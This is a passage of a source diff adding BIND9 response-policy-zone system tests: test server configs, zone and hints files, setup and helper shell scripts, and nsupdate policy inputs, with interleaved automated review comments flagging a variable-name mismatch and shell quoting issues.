+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.7;
+ notify-source 10.53.0.7;
+ transfer-source 10.53.0.7;
+ port @PORT@;
+ pid-file "named.pid";
+ statistics-file "named.stats";
+ session-keyfile "session.key";
+ listen-on { 10.53.0.7; };
+ listen-on-v6 { none; };
+ minimal-responses no;
+ recursion yes;
+ dnssec-validation yes;
+
+ response-policy {
+ zone "policy2" add-soa no;
+ } qname-wait-recurse no
+ nsip-enable yes
+ nsdname-enable yes
+ min-update-interval 0;
+
+ include "../dnsrps-slave.conf";
+};
+
+logging { category rpz { default_debug; }; };
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.7 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+include "../trusted.conf";
+
+zone "policy2" {
+ type secondary;
+ primaries { 10.53.0.5; };
+ file "policy2.db";
+ also-notify { 10.53.0.3 port @EXTRAPORT1@; };
+ notify-delay 0;
+ allow-transfer { any; };
+ request-ixfr no; // force axfr on rndc reload
+};
diff --git a/bin/tests/system/rpz/ns8/hints b/bin/tests/system/rpz/ns8/hints
new file mode 100644
index 0000000..b657c39
--- /dev/null
+++ b/bin/tests/system/rpz/ns8/hints
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+. 120 NS ns.
+ns. 120 A 10.53.0.1
diff --git a/bin/tests/system/rpz/ns8/manual-update-rpz.db.in b/bin/tests/system/rpz/ns8/manual-update-rpz.db.in
new file mode 100644
index 0000000..a823448
--- /dev/null
+++ b/bin/tests/system/rpz/ns8/manual-update-rpz.db.in
@@ -0,0 +1,21 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+; RPZ test
+; This basic file is copied to several zone files before being used.
+; Its contents are also changed with nsupdate
+
+
+$TTL 300
+@ SOA manual-update-rpz. hostmaster.ns.manual-rpz-update. ( 1 3600 1200 604800 60 )
+ NS ns.tld3.
+
+walled.tld2.manual-update-rpz. 300 A 10.0.0.1
diff --git a/bin/tests/system/rpz/ns8/named.conf.in b/bin/tests/system/rpz/ns8/named.conf.in
new file mode 100644
index 0000000..f228c00
--- /dev/null
+++ b/bin/tests/system/rpz/ns8/named.conf.in
@@ -0,0 +1,66 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+/*
+ * Main rpz test DNS server.
+ */
+
+options {
+ query-source address 10.53.0.8;
+ notify-source 10.53.0.8;
+ transfer-source 10.53.0.8;
+ port @PORT@;
+ pid-file "named.pid";
+ statistics-file "named.stats";
+ session-keyfile "session.key";
+ listen-on { 10.53.0.8; };
+ listen-on-v6 { none; };
+ notify yes;
+ minimal-responses no;
+ recursion yes;
+ dnssec-validation yes;
+
+ response-policy {
+ zone "manual-update-rpz";
+ }
+ // add-soa yes // do not set testing default mode
+ min-ns-dots 0
+ qname-wait-recurse yes
+ min-update-interval 0
+ nsdname-enable yes
+ nsip-enable yes
+ ;
+
+ include "../dnsrps.conf";
+ also-notify { 10.53.0.8 port @EXTRAPORT1@; };
+ notify-delay 0;
+};
+
+logging { category rpz { default_debug; }; };
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+controls {
+ inet 10.53.0.8 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+
+zone "." { type hint; file "hints"; };
+
+zone "manual-update-rpz." {
+ type primary;
+ file "manual-update-rpz.db";
+ notify no;
+};
diff --git a/bin/tests/system/rpz/ns9/hints b/bin/tests/system/rpz/ns9/hints
new file mode 100644
index 0000000..b657c39
--- /dev/null
+++ b/bin/tests/system/rpz/ns9/hints
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+. 120 NS ns.
+ns. 120 A 10.53.0.1
diff --git a/bin/tests/system/rpz/ns9/named.conf.in b/bin/tests/system/rpz/ns9/named.conf.in
new file mode 100644
index 0000000..e57591c
--- /dev/null
+++ b/bin/tests/system/rpz/ns9/named.conf.in
@@ -0,0 +1,60 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+/*
+ * DNS64 / RPZ server.
+ */
+
+options {
+ query-source address 10.53.0.9;
+ notify-source 10.53.0.9;
+ transfer-source 10.53.0.9;
+ port @PORT@;
+ pid-file "named.pid";
+ statistics-file "named.stats";
+ session-keyfile "session.key";
+ listen-on { 10.53.0.9; };
+ listen-on-v6 { none; };
+ notify yes;
+ minimal-responses no;
+ recursion yes;
+ dnssec-validation yes;
+ dns64-server "example.localdomain.";
+ dns64 64:ff9b::/96 { };
+ response-policy {
+ zone "rpz";
+ }
+ qname-wait-recurse no ;
+
+ include "../dnsrps.conf";
+ notify-delay 0;
+};
+
+logging { category rpz { default_debug; }; };
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+controls {
+ inet 10.53.0.9 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+
+zone "." { type hint; file "hints"; };
+
+zone "rpz." {
+ type primary;
+ file "rpz.db";
+ notify no;
+};
diff --git a/bin/tests/system/rpz/ns9/rpz.db b/bin/tests/system/rpz/ns9/rpz.db
new file mode 100644
index 0000000..dcbe5d6
--- /dev/null
+++ b/bin/tests/system/rpz/ns9/rpz.db
@@ -0,0 +1,16 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+rpz. 28800 IN SOA rpz. hostmaster.rpz. 6 10800 3600 2419200 900
+rpz. 28800 IN NS .
+a-only.example.rpz. 28800 IN CNAME *.
+no-a-no-aaaa.example.rpz. 28800 IN CNAME *.
+a-plus-aaaa.example.rpz. 28800 IN CNAME *.
diff --git a/bin/tests/system/rpz/qperf.sh b/bin/tests/system/rpz/qperf.sh
new file mode 100644
index 0000000..dc79de9
--- /dev/null
+++ b/bin/tests/system/rpz/qperf.sh
@@ -0,0 +1,22 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+for QDIR in `echo "$PATH" | tr : ' '` ../../../../contrib/queryperf; do
+ QPERF=$QDIR/queryperf
+ if test -f "$QPERF" -a -x "$QPERF"; then
+ echo $QPERF
+ exit 0
+ fi
+done
+
+exit 0
diff --git a/bin/tests/system/rpz/setup.sh b/bin/tests/system/rpz/setup.sh
new file mode 100644
index 0000000..10ab738
--- /dev/null
+++ b/bin/tests/system/rpz/setup.sh
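Review bot: In qperf.sh the candidate list is built by word-splitting `echo "$PATH" | tr : ' '` and the match is printed with an unquoted `echo $QPERF`, so a PATH entry containing whitespace is broken into separate bogus directories and a matching path is re-split on output before setup.sh captures it with `QPERF=$($SHELL qperf.sh)`. Quoting the output as `echo "$QPERF"` and iterating with `IFS=:` instead of `tr` would keep each directory intact. `test -f "$QPERF" -a -x "$QPERF"` also relies on the `-a` operator that POSIX marks obsolescent; `test -f "$QPERF" && test -x "$QPERF"` is the portable form. A short comment stating that the script prints nothing and still exits 0 when queryperf is absent would document the contract that setup.sh, which runs under `set -e`, depends on.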
@@ -0,0 +1,180 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# touch dnsrps-off to not test with DNSRPS
+
+set -e
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+QPERF=$($SHELL qperf.sh)
+
+USAGE="$0: [-DNx]"
+DEBUG=
+while getopts "DNx" c; do
+ case $c in
+ x) set -x; DEBUG=-x ;;
+ D) TEST_DNSRPS="-D" ;;
+ N) PARTIAL=-P ;;
+ *) echo "$USAGE" 1>&2; exit 1 ;;
+ esac
+done
+shift $((OPTIND - 1))
+if test "$#" -ne 0; then
+ echo "$USAGE" 1>&2
+ exit 1
+fi
+
+if [ ${NOCLEAN:-unset} = unset ]; then
+ $SHELL clean.sh $PARTIAL $DEBUG
+fi
+
+for dir in ns*; do
+ touch $dir/named.run
+ nextpart $dir/named.run > /dev/null
+done
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports ns3/named.conf.in ns3/named.conf
+copy_setports ns4/named.conf.in ns4/named.conf
+copy_setports ns5/named.conf.in ns5/named.conf
+copy_setports ns6/named.conf.in ns6/named.conf
+copy_setports ns7/named.conf.in ns7/named.conf
+copy_setports ns8/named.conf.in ns8/named.conf
+copy_setports ns9/named.conf.in ns9/named.conf
+copy_setports ns10/named.conf.in ns10/named.conf
+
+copy_setports dnsrpzd.conf.in dnsrpzd.conf
+
+# decide whether to test DNSRPS
+# Note that dnsrps.conf and dnsrps-slave.conf are included in named.conf
+# and differ from dnsrpz.conf which is used by dnsrpzd.
+$SHELL ../ckdnsrps.sh -A $TEST_DNSRPS $DEBUG
+test -z "$(grep 'dnsrps-enable yes' dnsrps.conf)" && TEST_DNSRPS=
+
+# set up test policy zones.
+# bl is the main test zone
+# bl-2 is used to check competing zones.
+# bl-{given,disabled,passthru,no-data,nxdomain,cname,wildcard,garden,
+# drop,tcp-only} are used to check policy overrides in named.conf.
+# NO-OP is an obsolete synonym for PASSHTRU
+for NM in '' -2 -given -disabled -passthru -no-op -nodata -nxdomain -cname -wildcname -garden -drop -tcp-only; do
+ sed -e "/SOA/s/blx/bl$NM/g" ns3/base.db >ns3/bl$NM.db
+done
+# bl zones are dynamically updated. Add one zone that is updated manually.
+cp ns3/manual-update-rpz.db.in ns3/manual-update-rpz.db
+cp ns8/manual-update-rpz.db.in ns8/manual-update-rpz.db
+
+cp ns3/mixed-case-rpz-1.db.in ns3/mixed-case-rpz.db
+
+# a zone that expires quickly and then can't be refreshed
+cp ns5/fast-expire.db.in ns5/fast-expire.db
+cp ns5/expire.conf.in ns5/expire.conf
+
+# $1=directory
+# $2=domain name
+# $3=input zone file
+# $4=output file
+signzone () {
+ KEYNAME=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -K $1 $2)
+ cat $1/$3 $1/$KEYNAME.key > $1/tmp
+ $SIGNER -P -K $1 -o $2 -f $1/$4 $1/tmp >/dev/null
+ sed -n -e 's/\(.*\) IN DNSKEY \([0-9]\{1,\} [0-9]\{1,\} [0-9]\{1,\}\) \(.*\)/trust-anchors {"\1" static-key \2 "\3";};/p' $1/$KEYNAME.key >>trusted.conf
+ DSFILENAME=dsset-${2}${TP}
+ rm $DSFILENAME $1/tmp
+}
+signzone ns2 tld2s base-tld2s.db tld2s.db
+
+# Performance and a few other checks.
+cat <<EOF >ns5/rpz-switch
+response-policy {
+ zone "bl0"; zone "bl1"; zone "bl2"; zone "bl3"; zone "bl4";
+ zone "bl5"; zone "bl6"; zone "bl7"; zone "bl8"; zone "bl9";
+ zone "bl10"; zone "bl11"; zone "bl12"; zone "bl13"; zone "bl14";
+ zone "bl15"; zone "bl16"; zone "bl17"; zone "bl18"; zone "bl19";
+ } recursive-only no
+ qname-wait-recurse no
+ nsip-enable yes
+ nsdname-enable yes
+ max-policy-ttl 90
+ break-dnssec yes
+ ;
+EOF
+
+cat <<EOF >ns5/example.db
+\$TTL 300
+@ SOA . hostmaster.ns.example.tld5. ( 1 3600 1200 604800 60 )
+ NS ns
+ NS ns1
+ns A 10.53.0.5
+ns1 A 10.53.0.5
+EOF
+
+cat <<EOF >ns5/bl.db
+\$TTL 300
+@ SOA . hostmaster.ns.blperf. ( 1 3600 1200 604800 60 )
+ NS ns.tld5.
+ +; for "qname-wait-recurse no" in #35 test1 +x.servfail A 35.35.35.35 +; for "recursive-only no" in #8 test5 +a3-5.tld2 CNAME . +; for "break-dnssec" in #9 & #10 test5 +a3-5.tld2s CNAME . +; for "max-policy-ttl 90" in #17 test5 +a3-17.tld2 500 A 17.17.17.17 + +; dummy NSDNAME policy to trigger lookups +ns1.x.rpz-nsdname CNAME . +EOF + +if test -n "$QPERF"; then + # Do not build the full zones if we will not use them. + $PERL -e 'for ($val = 1; $val <= 65535; ++$val) { + printf("host-%05d\tA 192.168.%d.%d\n", $val, $val/256, $val%256); + }' >>ns5/example.db + + echo >>ns5/bl.db + echo "; rewrite some names" >>ns5/bl.db + $PERL -e 'for ($val = 2; $val <= 65535; $val += 69) { + printf("host-%05d.example.tld5\tCNAME\t.\n", $val); + }' >>ns5/bl.db + + echo >>ns5/bl.db + echo "; rewrite with some not entirely trivial patricia trees" >>ns5/bl.db + $PERL -e 'for ($val = 3; $val <= 65535; $val += 69) { + printf("32.%d.%d.168.192.rpz-ip \tCNAME\t.\n", + $val%256, $val/256); + }' >>ns5/bl.db +fi + +# some psuedo-random queryperf requests +$PERL -e 'for ($cnt = $val = 1; $cnt <= 3000; ++$cnt) { + printf("host-%05d.example.tld5 A\n", $val); + $val = ($val * 9 + 32771) % 65536; + }' >ns5/requests + +cp ns2/bl.tld2.db.in ns2/bl.tld2.db +cp ns5/empty.db.in ns5/empty.db +cp ns5/empty.db.in ns5/policy2.db +cp ns6/bl.tld2s.db.in ns6/bl.tld2s.db + +# Run dnsrpzd to get the license and prime the static policy zones +if test -n "$TEST_DNSRPS"; then + DNSRPZD="$(../rpz/dnsrps -p)" + cd ns3 + "$DNSRPZ" -D../dnsrpzd.rpzf -S../dnsrpzd.sock -C../dnsrpzd.conf \ + -w 0 -dddd -L stdout >./dnsrpzd.run 2>&1 +fi diff --git a/bin/tests/system/rpz/test1 b/bin/tests/system/rpz/test1 new file mode 100644 index 0000000..3dc0375 --- /dev/null +++ b/bin/tests/system/rpz/test1 
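Review bot: In the closing `if test -n "$TEST_DNSRPS"` block of setup.sh the daemon path is stored in `DNSRPZD`, but the next command expands `"$DNSRPZ"`, which is not assigned anywhere in this hunk. Unless conf.sh (not visible here) defines it, the shell is asked to run an empty command name and, with `set -e` active, setup aborts whenever DNSRPS testing is enabled, so the "prime the static policy zones" step never runs. The invocation should start with `"$DNSRPZD" -D../dnsrpzd.rpzf -S../dnsrpzd.sock -C../dnsrpzd.conf \`. Separately, `signzone` expands `$1`..`$4` and `$KEYNAME` unquoted and writes to the fixed scratch name `$1/tmp`; quoting those expansions would keep an unusual directory or zone name from being word-split into extra arguments to `rm`.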
@@ -0,0 +1,99 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+
+
+
+; Use comment lines instead of blank lines to combine update requests into
+; single requests
+; Separate update requests for distinct TLDs with blank lines or 'send'
+; End the file with a blank line or 'send'
+
+server 10.53.0.3 @PORT@
+
+; QNAME tests
+
+; NXDOMAIN
+; 2, 25
+update add a0-1.tld2.bl. 300 CNAME .
+; NODATA
+; 3
+update add a3-1.tld2.bl. 300 CNAME *.
+; and no assert-botch
+; 4, 5
+update add a3-2.tld2.bl. 300 DNAME example.com.
+;
+; NXDOMAIN for a4-2-cname.tld2 via its target a4-2.tld2.
+; 6 and 7
+update add a4-2.tld2.bl 300 CNAME .
+; 8
+; NODATA for a4-3-cname.tld2 via its target a4-3.tld2.
+update add a4-3.tld2.bl 300 CNAME *.
+;
+; replace the A for a4-1.sub1.tld2 with 12.12.12.12
+; 9
+update add a4-1.sub1.tld2.bl. 300 A 12.12.12.12
+;
+; replace the A for *.sub2.tld2 with 12.12.12.12
+; 10
+update add a4-1.sub2.tld2.bl. 300 A 12.12.12.12
+;
+; replace NXDOMAIN for {nxc1,nxc2}.sub1.tld2 with 12.12.12.12 using CNAMEs
+; 11
+update add nxc1.sub1.tld2.bl. 300 CNAME a12.tld2.
+; 12
+update add nxc2.sub1.tld2.bl. 300 CNAME a12-cname.tld2.
+;
+; prefer the first conflicting zone
+; 13
+update add a4-4.tld2.bl. 300 A 127.4.4.1
+update add a6-1.tld2.bl. 300 CNAME a6-1.tld2.
+update add a6-2.tld2.bl. 300 A 127.6.2.1
+update add a6-1.tld2.bl. 300 A 127.6.1.1
+update add a6-2.tld2.bl. 300 CNAME a6-2.tld2.
+send
+update add a4-4.tld2.bl-2. 300 A 127.4.4.2
+send
+
+; wildcard CNAME
+; 16
+update add a3-6.tld2.bl. 300 CNAME *.tld4.
+; 17
+update add *.sub1.tld2.bl. 300 CNAME *.tld4.
+; CNAME chain +; 18 +update add a4-5.tld2.bl. 300 A 127.0.0.16 +; stop at first hit in CNAME chain +; 19 +update add a4-6.tld2.bl. 300 CNAME . +update add a4-6-cname.tld2.bl. 300 A 127.0.0.17 +; no change instead of NXDOMAIN because +norecurse +; 20 +update add a5-2.tld2.bl. 300 CNAME . +; no change instead of NODATA because +norecurse +; 21 +update add a5-3.tld2.bl. 300 CNAME *. +; 22, 23 +update add a5-4.tld2.bl. 300 DNAME example.com. +; +; assert in rbtdb.c +; 24 +update add c1.crash2.tld3.bl. 300 CNAME . +; DO=1 without signatures, DO=0 with signatures are rewritten +; 26 - 27 +update add a0-1.tld2s.bl. 300 CNAME . +; 32 +update add a3-8.tld2.bl. 300 CNAME rpz-drop. +; 33 +update add a3-9.tld2.bl. 300 CNAME rpz-tcp-only. +; 34 qname-wait-recurse yes +update add x.servfail.bl. 300 A 127.0.0.34 +send diff --git a/bin/tests/system/rpz/test2 b/bin/tests/system/rpz/test2 new file mode 100644 index 0000000..ad71e3a --- /dev/null +++ b/bin/tests/system/rpz/test2 
@@ -0,0 +1,77 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+
+
+
+; Use comment lines instead of blank lines to combine update requests into
+; single requests
+; Separate update requests for distinct TLDs with blank lines or 'send'
+; End the file with a blank line or 'send'
+; CNAME targets are absolute even without trailing "."
+
+; IP tests
+
+server 10.53.0.3 @PORT@
+
+; NODATA a3-1.tld2
+; 1
+update add 32.1.3.168.192.rpz-ip.bl 300 CNAME *.
+;
+; NXDOMAIN for 192.168.4.0/24, the network of a4-1.tld2 and a4-2.tld2
+; 4
+update add 24.0.4.168.192.rpz-ip.bl 300 CNAME .
+;
+; old passthru in NXDOMAIN CIDR block to leave a4-1.tld2 unchanged
+; 3
+update add 32.1.4.168.192.rpz-ip.bl 300 CNAME 32.1.4.168.192
+;
+; NODATA for a4-3.tld2
+; 8
+update add 32.3.4.168.192.rpz-ip.bl 300 CNAME *.
+;
+; NXDOMAIN for IPv6 a3-1.tld2
+; 9
+update add 128.1.zz.3.2.2001.rpz-ip.bl 300 CNAME .
+;
+; apply the policy with the lexically smaller trigger address of 192.168.5.1
+; to an RRset of more than one A RR
+; 11
+update add 32.1.5.168.192.rpz-ip.bl 300 A 127.0.0.1
+update add 32.2.5.168.192.rpz-ip.bl 300 A 127.0.0.2
+;
+; prefer first conflicting IP zone for a5-3.tld2
+; 12
+update add 32.3.5.168.192.rpz-ip.bl 300 A 127.0.0.1
+send
+update add 32.3.5.168.192.rpz-ip.bl-2 300 A 127.0.0.2
+send
+
+; prefer QNAME to IP for a5-4.tld2
+; 13, 14
+update add 32.4.5.168.192.rpz-ip.bl 300 CNAME a12.tld2.
+update add a5-4.tld2.bl 300 CNAME a14.tld4.
+;
+; poke hole in NXDOMAIN CIDR block to leave a4-4.tld2 unchanged
+; 15
+update add 32.4.4.168.192.rpz-ip.bl 300 CNAME rpz-passthru.
+;
+; assert in rbtdb.c
+; 16
+update add 32.16.1.16.172.rpz-ip.bl 300 CNAME .
+send
+update add c2.crash2.tld3.bl-2 300 A 127.0.0.16
+send
+
+; client-IP address trigger
+; 17
+update add 32.1.0.53.10.rpz-client-ip.bl 300 A 127.0.0.17
+send
diff --git a/bin/tests/system/rpz/test3 b/bin/tests/system/rpz/test3
new file mode 100644
index 0000000..222b757
--- /dev/null
+++ b/bin/tests/system/rpz/test3
@@ -0,0 +1,47 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+
+
+; Use comment lines instead of blank lines to combine update requests into
+; single requests
+; Separate update requests for distinct TLDs with blank lines or 'send'
+; End the file with a blank line or 'send'
+
+; NSDNAME tests
+
+server 10.53.0.3 @PORT@
+
+; 3, 4, 5
+; NXDOMAIN for *.sub1.tld2 by NSDNAME
+update add *.sub1.tld2.rpz-nsdname.bl. 300 CNAME .
+;
+; 6
+; walled garden for *.sub2.tld2
+update add *.sub2.tld2.rpz-nsdname.bl. 300 CNAME a12-cname.tld2.
+;
+; 7, 8
+; exempt a3-2.tld2 and anything in 192.168.0.0/24
+; also checks that IP policies are preferred over NSDNAME policies
+update add a3-2.tld2.bl 300 CNAME a3-2.tld2.
+update add 24.0.0.168.192.rpz-ip.bl 300 CNAME 24.0.0.168.192.
+;
+; 9
+; prefer QNAME policy to NSDNAME policy
+update add a4-1.tld2.bl. 300 A 12.12.12.12
+; 10
+; prefer policy for largest NS name
+update add ns.sub3.tld2.rpz-nsdname.bl. 300 A 127.0.0.1
+update add ns.subsub.sub3.tld2.rpz-nsdname.bl. 300 A 127.0.0.2
+
+; ip-as-qname rewrites all of tld5
+update add ns.tld5.bl. 300 A 12.12.12.12
+send
diff --git a/bin/tests/system/rpz/test4 b/bin/tests/system/rpz/test4
new file mode 100644
index 0000000..7b95dd3
--- /dev/null
+++ b/bin/tests/system/rpz/test4
@@ -0,0 +1,36 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+
+
+; Use comment lines instead of blank lines to combine update requests into
+; single requests
+; Separate update requests for distinct TLDs with blank lines or 'send'
+; End the file with a blank line or 'send'
+
+; NSIP tests
+
+server 10.53.0.3 @PORT@
+
+; NXDOMAIN for all of tld2 based on its server IP address
+update add 32.2.0.53.10.rpz-nsip.bl. 300 CNAME .
+;
+; exempt a3-2.tld2 and anything in 192.168.0.0/24
+; also checks that IP policies are preferred over NSIP policies
+update add a3-2.tld2.bl 300 CNAME a3-2.tld2.
+update add 24.0.0.168.192.rpz-ip.bl 300 CNAME 24.0.0.168.192.
+;
+; prefer NSIP policy to NSDNAME policy
+update add ns.tld2.rpz-nsdname.bl. 300 CNAME 10.0.0.1
+
+; ip-as-ns rewrites all of tld5
+update add 32.5.0.53.10.rpz-ip.bl. 300 A 12.12.12.12
+send
diff --git a/bin/tests/system/rpz/test4a b/bin/tests/system/rpz/test4a
new file mode 100644
index 0000000..83a175d
--- /dev/null
+++ b/bin/tests/system/rpz/test4a
@@ -0,0 +1,27 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+
+
+; Use comment lines instead of blank lines to combine update requests into
+; single requests
+; Separate update requests for distinct TLDs with blank lines or 'send'
+; End the file with a blank line or 'send'
+
+; walled-garden NSIP tests
+
+server 10.53.0.3 @PORT@
+
+; rewrite all of tld2 based on its server IP address
+update add 32.2.0.53.10.rpz-nsip.bl. 300 A 41.41.41.41
+update add 32.2.0.53.10.rpz-nsip.bl. 300 AAAA 2041::41
+update add 32.2.0.53.10.rpz-nsip.bl. 300 TXT "NSIP walled garden"
+send
diff --git a/bin/tests/system/rpz/test5 b/bin/tests/system/rpz/test5
new file mode 100644
index 0000000..f30a6be
--- /dev/null
+++ b/bin/tests/system/rpz/test5
@@ -0,0 +1,60 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+
+
+; Use comment lines instead of blank lines to combine update requests into
+; single requests
+; Separate update requests for distinct TLDs with blank lines or 'send'
+; End the file with a blank line or 'send'
+
+; the policies or replacements specified in ns3/named.conf override these
+
+server 10.53.0.3 @PORT@
+
+; 1
+update add a3-1.tld2.bl-given. 300 A 127.0.0.1
+send
+; 2
+update add a3-2.tld2.bl-passthru. 300 A 127.0.0.2
+send
+; 3
+update add a3-3.tld2.bl-no-op. 300 A 127.0.0.3
+send
+; 4
+update add a3-4.tld2.bl-disabled. 300 A 127.0.0.4
+send
+; 5 - 7
+update add a3-5.tld2.bl-nodata. 300 A 127.0.0.5
+send
+; 11
+update add a3-6.tld2.bl-nxdomain. 300 A 127.0.0.11
+send
+; 12
+update add a3-7.tld2.bl-cname. 300 A 127.0.0.12
+send
+; 13
+update add a3-8.tld2.bl-wildcname. 300 A 127.0.0.13
+; 14
+update add *.sub9.tld2.bl-wildcname. 300 A 127.0.1.14
+send
+; 15
+update add a3-15.tld2.bl-garden. 300 A 127.0.0.15
+send
+; 16
+update add a3-16.tld2.bl. 300 A 127.0.0.16
+send
+; 18
+update add a3-18.tld2.bl-drop. 300 A 127.0.0.18
+send
+; 19
+update add a3-19.tld2.bl-tcp-only. 300 A 127.0.0.19
+send
diff --git a/bin/tests/system/rpz/test6 b/bin/tests/system/rpz/test6
new file mode 100644
index 0000000..e5c2381
--- /dev/null
+++ b/bin/tests/system/rpz/test6
@@ -0,0 +1,37 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+
+
+; Use comment lines instead of blank lines to combine update requests into
+; single requests
+; Separate update requests for distinct TLDs with blank lines or 'send'
+; End the file with a blank line or 'send'
+
+server 10.53.0.3 @PORT@
+
+; Poke the radix tree a little.
+update add 128.1111.2222.3333.4444.5555.6666.7777.8888.rpz-ip.bl. 300 CNAME .
+update add 128.1111.2222.3333.4444.5555.6666.zz.rpz-ip.bl. 300 CNAME .
+update add 128.1111.2222.3333.4444.5555.zz.8888.rpz-ip.bl. 300 CNAME .
